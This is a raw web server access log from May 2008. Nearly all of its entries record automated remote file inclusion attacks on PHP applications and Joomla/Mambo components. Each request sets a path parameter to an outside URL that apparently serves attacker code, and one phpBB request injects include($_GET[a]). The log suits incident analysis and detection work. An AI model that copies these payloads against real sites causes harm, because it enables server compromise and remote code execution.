58.26.137.64 - - [19/May/2008:11:05:47 -0700] "GET //start.php?s=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:07:11 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:07:11 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:07:12 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:11:07:16 -0700] "GET //redaxo/include/pages/community.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:11:07:16 -0700] "GET /logs//redaxo/include/pages/community.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:11:07:35 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:08:09 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:08:10 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.239.77 - - [19/May/2008:11:08:14 -0700] "GET /logs/index.php?incl=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.239.77 - - [19/May/2008:11:08:17 -0700] "GET /index.php?incl=http://valorvirtual.com//on? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:08:20 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.109.22.98 - - [19/May/2008:11:08:22 -0700] "GET /sallamahttp://dsvv.org/dsvv/user_file/iblees/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:08:30 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:08:34 -0700] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:08:35 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:08:35 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:09:13 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [19/May/2008:11:09:13 -0700] "GET /logs/index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [19/May/2008:11:09:19 -0700] "GET /index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:11:09:31 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:09:34 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:11:09:36 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:09:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.24.52.96 - - [19/May/2008:11:09:42 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:11:09:42 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:09:43 -0700] "GET /logs/access.log///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:09:44 -0700] "GET ///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:09:44 -0700] "GET /logs///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:11:09:52 -0700] "GET /logs/access_071219.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:11:09:52 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:11:09:52 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:11:09:55 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:09:59 -0700] "GET /logs/access_080125.log//send_reminders.php?includedir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:09:59 -0700] "GET /logs/access_080104.log//send_reminders.php?includedir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:11:10:01 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [19/May/2008:11:10:02 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:10:08 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:10:09 -0700] "GET //skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:10:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:11:10:11 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:10:13 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:10:13 -0700] "GET //skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:10:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:11:10:15 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:11:10:15 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.11.215 - - [19/May/2008:11:10:25 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.197.120 - - [19/May/2008:11:11:12 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [19/May/2008:11:11:12 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:11:39 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:11:40 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:11:40 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.140.229 - - [19/May/2008:11:12:06 -0700] "GET /logs/access_080215.log//auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.140.229 - - [19/May/2008:11:12:06 -0700] "GET //auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.140.229 - - [19/May/2008:11:12:07 -0700] "GET /logs//auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.241.197.120 - - [19/May/2008:11:12:08 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [19/May/2008:11:12:08 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.109.18 - - [19/May/2008:11:12:09 -0700] "GET /logs/access_080215.log//auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.18 - - [19/May/2008:11:12:10 -0700] "GET //auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.18 - - [19/May/2008:11:12:10 -0700] "GET /logs//auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:12:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:12:25 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:12:26 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:11:12:27 -0700] "GET /logs//include.php?path[docroot]=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:12:28 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:11:12:28 -0700] "GET //include.php?path[docroot]=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:13:07 -0700] "GET /logs/access_080120.log///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:11:13:13 -0700] "GET /main.php?pagina=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:11:13:13 -0700] "GET /logs/main.php?pagina=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:11:13:38 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:11:13:54 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:11:13:54 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:11:13:54 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:14:52 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:14:57 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
98.173.1.8 - - [19/May/2008:11:15:01 -0700] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.173.1.8 - - [19/May/2008:11:15:01 -0700] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:11:15:19 -0700] "GET /logs/access_080218.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:11:15:20 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:11:15:20 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.16.26.124 - - [19/May/2008:11:15:43 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
217.16.26.124 - - [19/May/2008:11:15:48 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:11:15:50 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:15:52 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:11:15:55 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:15:59 -0700] "GET //skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:16:01 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:11:16:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 4140 "-" "libwww-perl/5.65" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:11:16:25 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.17.188.208 - - [19/May/2008:11:16:25 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:16:28 -0700] "GET /logs/access_080225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:16:28 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:16:29 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.234.200.16 - - [19/May/2008:11:16:32 -0700] "GET /logs/access_080215.log//auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.16 - - [19/May/2008:11:16:33 -0700] "GET //auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.16 - - [19/May/2008:11:16:33 -0700] "GET /logs//auto.php?inc=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:16:34 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:16:34 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:16:42 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:11:16:42 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:11:16:42 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:16:43 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.90.204 - - [19/May/2008:11:16:44 -0700] "GET /logs/index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:16:44 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.90.204 - - [19/May/2008:11:16:51 -0700] "GET /index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:11:16:53 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:11:16:53 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:16:53 -0700] "GET /logs/access_080112.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:16:59 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:16:59 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
